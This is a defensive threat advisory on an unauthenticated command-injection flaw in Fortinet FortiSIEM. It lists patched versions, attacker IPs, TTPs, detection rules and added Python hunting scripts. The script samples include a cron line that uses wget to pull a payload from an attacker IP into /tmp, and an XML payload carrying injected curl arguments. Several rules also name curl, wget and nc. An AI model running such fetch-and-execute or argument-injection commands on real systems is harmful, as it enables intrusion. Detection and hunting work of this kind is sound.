CVE-2025-64155 Critical OS command injection vulnerability in Fortinet FortiSIEM

BLUF

 An attacker can execute arbitrary commands with root privileges by sending a specially crafted TCP request to the phMonitor service on port 7900. No authentication is required for exploitation. The flaw exists in the elastic_test_url.sh script due to improper neutralization of user input.

Executive Cost Summary

This cost analysis was developed by the CyberDax team using expert judgment and assisted analytical tools to support clarity and consistency.


For organizations affected by unauthenticated remote command execution against Fortinet FortiSIEM (CVE-2025-64155):

·       Low-end total cost: $800K – $1.3M

o   (Rapid patching, no lateral movement, limited log integrity concerns)

·       Typical expected range: $1.5M – $2.8M

o   (Short dwell time, SIEM rebuild required, expanded enterprise threat hunt)

·       Upper-bound realistic scenarios: $3.0M – $5.0M

o   (Delayed detection, regulatory scrutiny, SIEM-enabled lateral access validated)

Key Cost Drivers

·       Duration of attacker access before containment

·       Extent of SIEM log integrity loss and revalidation scope

·       Regulatory obligations tied to monitoring and audit controls

·       Dependence on FortiSIEM for customer or compliance reporting

·       Cyber insurance exclusions related to control-plane compromise

Targeted Sectors

Managed Security Service Providers (MSSPs), Government, Finance, Healthcare, and Telecommunications.

Countries

·       Global

Date of First Reported Activity

·       January 13, 2026

Date of Last Reported Activity Update

·       January 17, 2026

Suspected APT groups

·       China-Nexus Actors

Suspected associated Criminal Organizations

·       Black Basta (Cluster)

·       Initial Access Brokers (IABs)

CVE-2025-64155

CVSS 3.1 Vector

·       (9.8) AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CVSS 4.0

·       (9.4) AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:L/SI:L/SA:L

Nessus ID

·       214151

Is CVE-2025-64155 on the KEV list

·       Not at this time

What is the patch by date for CVE-2025-64155

·       Not applicable at this time

Patching

Fixed Versions

·       FortiSIEM 7.4.1

·       FortiSIEM 7.3.5

·       FortiSIEM 7.2.3

·       FortiSIEM 7.1.9

·       FortiSIEM 7.0.5

·       FortiSIEM 6.7.11
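To turn the fixed-version list above into a check that can be run over an inventory, here is an added example (not CyberDax's or Fortinet's code). It compares a reported FortiSIEM version against the fixed release for its major.minor branch, using exactly the six fixed builds listed above. The accepted version-string formats ("FortiSIEM 7.3.4" or a bare "7.3.4"), the treatment of a two-part version such as "7.4" as ".0", and the "unknown-branch" result for branches with no fixed build listed here are assumptions.

```python
from typing import Dict, Tuple

# Fixed versions as listed in this advisory, keyed by major.minor branch.
FIXED_VERSIONS: Dict[Tuple[int, int], Tuple[int, int, int]] = {
    (7, 4): (7, 4, 1),
    (7, 3): (7, 3, 5),
    (7, 2): (7, 2, 3),
    (7, 1): (7, 1, 9),
    (7, 0): (7, 0, 5),
    (6, 7): (6, 7, 11),
}


def parse_version(text: str) -> Tuple[int, ...]:
    """Parse 'FortiSIEM 7.3.4' or '7.3.4' into a tuple of ints (assumed formats)."""
    words = text.strip().split()
    if not words:
        raise ValueError("empty version string")
    parts = words[-1].split(".")
    if len(parts) < 2 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(p) for p in parts)


def patch_status(text: str) -> str:
    """Return 'patched', 'vulnerable' or 'unknown-branch' for one version string."""
    version = parse_version(text)
    fixed = FIXED_VERSIONS.get(version[:2])
    if fixed is None:
        # No fixed build for this branch appears in the advisory; review separately.
        return "unknown-branch"
    # Pad so that a bare "7.4" compares as 7.4.0; longer build strings compare lexicographically.
    padded = version + (0,) * max(0, 3 - len(version))
    return "patched" if padded >= fixed else "vulnerable"


def triage_inventory(inventory: Dict[str, str]) -> Dict[str, str]:
    """Map hostname -> status for every appliance that is not confirmed patched."""
    needs_action = {}
    for host, version in inventory.items():
        status = patch_status(version)
        if status != "patched":
            needs_action[host] = status
    return needs_action


if __name__ == "__main__":
    # Constructed sample inventory (hostnames and versions are made up).
    sample = {
        "siem-sup-01": "FortiSIEM 7.3.4",
        "siem-sup-02": "FortiSIEM 7.3.5",
        "siem-col-07": "6.7.10",
        "siem-lab-legacy": "6.6.2",
    }
    for host, status in triage_inventory(sample).items():
        print(f"{host}: {status}")
```

Feed it the version strings your asset register or the appliance's own version banner reports; anything returned as "vulnerable" or "unknown-branch" should be scheduled against the fixed builds above.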

Official Patch Link

·       hxxps://www.fortiguard.com/psirt/FG-IR-25-772

Malware Names

·       redishb.sh (Persistence/Downloader)

·       forti_shell.py (Reverse Shell)

Malware Samples

·       Not applicable

Tools

·       Curl

·       Wget

·       Nc

·       Gobuster

·       masscan

IOCs

As a reminder, hunting should focus on the heuristic behavior of the attacks. Hashes, domains, etc. tend to be dynamic: they will usually differ for each target and attack, and can differ even within the same attack.

Network Indicators

Threat actors have been observed using various global infrastructures to deliver payloads, perform scanning, and attempt reverse shells.

·       38.180.81.238

o   Observed delivering the redishb.sh payload (US/Chicago).

·       154.192.222.43

o   Highly active; associated with data exfiltration, gobuster scanning, and Nmap probes (Pakistan).

·       146.70.201.245

o   Used for advanced RCE and reverse shell attempts (Japan).

·       103.224.84.76

o   Payload delivery of redishb.sh (Thailand).

·       156.146.55.227

o   HTTP exfiltration testing to postb.in (Bulgaria).

·       120.231.127.227 & 220.181.41.80

o   China-based IPs conducting timing tests (e.g., sleep 3) to verify vulnerability.

·       167.17.179.109 & 209.126.11.25

o   Payload delivery of redishb.sh (Baxet Group and Contabo infrastructure).

Host-Based & Behavioral Indicators

Malicious Files

·       redishb.sh: A shell script frequently used as a primary stage payload.

Suspicious Log Entries

·       Check files in /opt/phoenix/log/phoenix for suspicious PHL_ERROR entries.

·       Look for logs containing external attacker URLs or unusual file paths.

Network Traffic Patterns

·       Unexpected inbound traffic on TCP port 7900

·       Outbound connections from the FortiSIEM appliance using tools like curl or wget to fetch remote scripts.

·       Reverse shell activity originating from the appliance reaching back to external IP addresses

TTPs

Initial Access & Execution

·       T1190 Exploit Public-Facing Application

o   Attackers exploit the unauthenticated API endpoint on TCP port 7900.

·       T1059.004 Command and Scripting Interpreter Unix Shell

o   The vulnerability allows for direct OS command injection to execute arbitrary shell commands.

·       T1203 Exploitation for Client Execution

o   Used in some classifications to describe the execution of unauthorized code via crafted requests.

Persistence & Privilege Escalation

·       T1068 Exploitation for Privilege Escalation

o   Attackers use the initial command injection to escalate from the admin user context to root access.

·       T1543.003 Create or Modify System Process

o   Windows Service (Unix equivalent: T1543.002). Observed tactics include writing malicious files to disk or modifying system binaries to maintain access.

·       T1053.003 Scheduled Task/Job

o   Cron: Attackers have been observed modifying cron jobs to ensure persistence on the compromised system.

Defense Evasion & Lateral Movement

·       T1070 Indicator Removal on Host

o   Observed attempts to cover tracks by removing indicators of compromise and modifying system logs.

·       T1210 Exploitation of Remote Services

o   Once initial access is gained, the compromise of a SIEM allows attackers to pivot and move laterally within the network.

·       T1557 Adversary-in-the-Middle

o   By controlling the SIEM, attackers can read and alter logs or disable security detections.

Suggested rules / potential hunts

Suricata

Detects the initial XML payload containing the elastic storage type and potential argument injection characters (e.g., -o, -F).

alert tcp any any -> any 7900 (msg:"ET EXPLOIT FortiSIEM phMonitor RCE Attempt (CVE-2025-64155)"; flow:established,to_server; content:"<storageType>elastic</storageType>"; nocase; content:"-o"; distance:0; reference:cve,2025-64155; classtype:attempted-admin; sid:1000001; rev:1;)


Detect Outbound Curl Artifacts

alert tcp $HOME_NET any -> $EXTERNAL_NET any (msg:"ET EXPLOIT Suspicious Curl Outbound from FortiSIEM (Possible CVE-2025-64155)"; flow:established,to_server; content:"User-Agent|3a| curl/"; nocase; reference:cve,2025-64155; sid:1000002; rev:1;)

SentinelOne

Identify Malicious phMonitor Child Processes

ProcessName = "phMonitor" AND ChildProcessName IN ("sh", "bash", "curl", "nc")


Detect Cron Job Persistence

The exploit often waits for a cron job to execute the payload.

ProcessName = "crond" AND Commandline Contains Any ("/tmp/", "curl", "wget")


File Overwrite Detection

Look for arbitrary file writes by the admin user as part of the privilege escalation chain.

UserName = "admin" AND EventType = "File Modification" AND FilePath In ("/etc/cron.d/", "/var/spool/cron/")
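The Suspicious Log Entries bullets under Host-Based & Behavioral Indicators and the cron persistence hunts above describe the same checks from two angles; here is an added example (not CyberDax's or SentinelOne's code) that applies both to local files on the appliance. It flags PHL_ERROR lines whose URLs point at hosts outside RFC 1918/loopback space or that reference world-writable temp paths, and cron entries that invoke curl, wget or nc or execute from /tmp. The sample log and cron lines are constructed; the FortiSIEM log field layout and the internal-network definition are assumptions, and only the PHL_ERROR marker, the 38.180.81.238 address, /opt/phoenix/log/phoenix, /etc/cron.d/ and /var/spool/cron/ come from the advisory.

```python
import glob
import ipaddress
import os
import re
import sys
from typing import Iterable, List, Tuple

# Assumption: "internal" means RFC 1918, loopback and link-local; anything else is external.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]
URL_HOST_RE = re.compile(r"https?://([A-Za-z0-9.\-]+)")
TMP_PATH_RE = re.compile(r"(?:/tmp|/var/tmp|/dev/shm)/[^\s\"',]+")
FETCH_TOOL_RE = re.compile(r"\b(?:curl|wget|nc|ncat)\b")

# Constructed sample lines; the field layout is an assumption, not the real phMonitor format.
SAMPLE_PHOENIX_LOG = [
    "2026-01-14T03:12:44 fsm phMonitor[2231]: [eventSeverity]=PHL_INFO,[phLogDetail]=heartbeat ok",
    "2026-01-14T03:13:02 fsm phMonitor[2231]: [eventSeverity]=PHL_ERROR,[phLogDetail]=elastic test failed url=http://38.180.81.238/redishb.sh",
    "2026-01-14T03:13:05 fsm phMonitor[2231]: [eventSeverity]=PHL_ERROR,[phLogDetail]=cannot write /tmp/.x/out",
    "2026-01-14T03:14:00 fsm phMonitor[2231]: [eventSeverity]=PHL_ERROR,[phLogDetail]=connect failed url=https://10.0.5.20:9200",
]
SAMPLE_CRON = [
    "# constructed /etc/cron.d sample",
    "0 2 * * * root /usr/sbin/logrotate /etc/logrotate.conf",
    "*/5 * * * * root wget -q -O /tmp/redishb.sh http://38.180.81.238/redishb.sh",
    "@reboot admin /tmp/.x/run.sh",
]


def is_external_host(host: str) -> bool:
    """True for an IP outside INTERNAL_NETS, or for any DNS name other than localhost."""
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        return host.lower() != "localhost"
    return not any(ip in net for net in INTERNAL_NETS)


def flag_phoenix_log(lines: Iterable[str]) -> List[Tuple[str, List[str]]]:
    """Return (line, reasons) for PHL_ERROR lines carrying external URLs or temp paths."""
    hits = []
    for line in lines:
        if "PHL_ERROR" not in line:
            continue
        reasons = [f"external url host {h}" for h in URL_HOST_RE.findall(line) if is_external_host(h)]
        if TMP_PATH_RE.search(line):
            reasons.append("world-writable temp path")
        if reasons:
            hits.append((line, reasons))
    return hits


def flag_cron_lines(lines: Iterable[str]) -> List[str]:
    """Return cron entries that fetch remote content or execute from temp directories."""
    hits = []
    for line in lines:
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        if FETCH_TOOL_RE.search(stripped) or TMP_PATH_RE.search(stripped):
            hits.append(line)
    return hits


def hunt_files(log_glob: str, cron_globs: List[str]) -> List[str]:
    """Read live files and return printable findings (assumes root access on the appliance)."""
    out = []
    for path in glob.glob(log_glob):
        if os.path.isfile(path):
            with open(path, errors="replace") as fh:
                out += [f"{path}: {'; '.join(r)}: {l.rstrip()}" for l, r in flag_phoenix_log(fh)]
    for pattern in cron_globs:
        for path in glob.glob(pattern):
            if os.path.isfile(path):
                with open(path, errors="replace") as fh:
                    out += [f"{path}: {l.rstrip()}" for l in flag_cron_lines(fh)]
    return out


if __name__ == "__main__":
    if len(sys.argv) > 1 and sys.argv[1] == "live":
        for finding in hunt_files("/opt/phoenix/log/phoenix/*", ["/etc/cron.d/*", "/var/spool/cron/*"]):
            print(finding)
    else:
        for line, reasons in flag_phoenix_log(SAMPLE_PHOENIX_LOG):
            print("LOG  ", "; ".join(reasons), "->", line)
        for line in flag_cron_lines(SAMPLE_CRON):
            print("CRON ->", line)
```

Run it with no arguments to see the constructed samples triaged; run it with "live" on the appliance to walk the log and cron locations named above. Any URL host it reports as external is a candidate for the network indicator list, and any flagged cron line should be compared against a known-good build before it is removed.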

Splunk

Detect phMonitor Service Port Activity

Identify unusual external IP addresses connecting to the phMonitor port.

index=network sourcetype=suricata dest_port=7900 | stats count by src_ip, dest_ip


Monitor Shell Activity in /tmp

Common payloads for this CVE involve writing to /tmp.

index=os sourcetype=bash_history command="*/tmp/*" | table _time, host, user, command


Argument Injection Patterns

Search for logs containing XML payloads with injected curl arguments.

index=web_logs "storageType>elastic" AND ("-o " OR "--output" OR "-F ")
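The Suricata rule under Suggested rules and the Splunk Argument Injection Patterns hunt above both key on the elastic storage type followed by curl-style option tokens. Here is an added example (not CyberDax's, Fortinet's or Suricata's code) that performs the same check on a captured phMonitor payload: it parses the XML, confirms storageType is elastic, and flags any other field value that carries a whitespace-separated option-like token or a shell metacharacter; input that does not parse falls back to the raw content match the Suricata rule uses, so a truncated payload is not silently ignored. Only the storageType element comes from the advisory; the other element names and the sample payloads are constructed.

```python
import re
import xml.etree.ElementTree as ET
from typing import List, Tuple

ARG_TOKEN_RE = re.compile(r"(?:^|\s)(--?[A-Za-z][\w-]*)")   # option-like token after whitespace
SHELL_META_RE = re.compile(r"[;|&`$()<>]")                   # chaining / substitution characters
RAW_OPTION_RE = re.compile(r"\s-o\b|--output|\s-F\b")        # the tokens the Splunk hunt looks for

# Constructed sample payloads; <url>, <user> and <path> are guessed element names.
BENIGN = ("<request><storageType>elastic</storageType>"
          "<url>https://10.0.5.20:9200</url><user>svc-siem</user></request>")
SUSPICIOUS = ("<request><storageType>elastic</storageType>"
              "<url>https://10.0.5.20:9200 -o /tmp/x</url><user>svc-siem</user></request>")
OTHER_STORAGE = "<request><storageType>local</storageType><path>-o</path></request>"
TRUNCATED = "<request><storageType>elastic</storageType><url>https://10.0.5.20:9200 -o /tmp/x"


def inspect_payload(xml_text: str) -> List[Tuple[str, str]]:
    """Return (element, reason) findings for an elastic storage-test payload."""
    findings: List[Tuple[str, str]] = []
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        # Malformed or cut-off capture: apply the raw content match instead of giving up.
        if "<storagetype>elastic</storagetype>" in xml_text.lower() and RAW_OPTION_RE.search(xml_text):
            findings.append(("<raw>", "unparseable payload with elastic storage type and curl-style option"))
        return findings
    storage = root.find(".//storageType")
    if storage is None or (storage.text or "").strip().lower() != "elastic":
        return findings  # other storage types are outside the scope of this rule
    for elem in root.iter():
        if elem is storage or not elem.text:
            continue
        value = elem.text.strip()
        for tok in ARG_TOKEN_RE.findall(value):
            findings.append((elem.tag, f"option-like token {tok!r}"))
        if SHELL_META_RE.search(value):
            findings.append((elem.tag, "shell metacharacter"))
    return findings


if __name__ == "__main__":
    for name, payload in (("benign", BENIGN), ("suspicious", SUSPICIOUS),
                          ("other-storage", OTHER_STORAGE), ("truncated", TRUNCATED)):
        print(name, "->", inspect_payload(payload) or "clean")
```

Wire it into whatever captures port 7900 traffic (a PCAP carve, a proxy log, or the web_logs index the Splunk hunt queries) and treat any non-empty result as a trigger for the host-based checks in the sections above. Because the option-token regex requires whitespace before the dash, ordinary values such as "svc-siem" or a hostname with hyphens do not fire.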


References

Arctic Wolf

·       hxxps://arcticwolf.com/resources/blog/cve-2025-64155/

Tenable

·       hxxps://www.tenable.com/cve/CVE-2025-64155/plugins

NVD

·       hxxps://nvd.nist.gov/vuln/detail/CVE-2025-64155
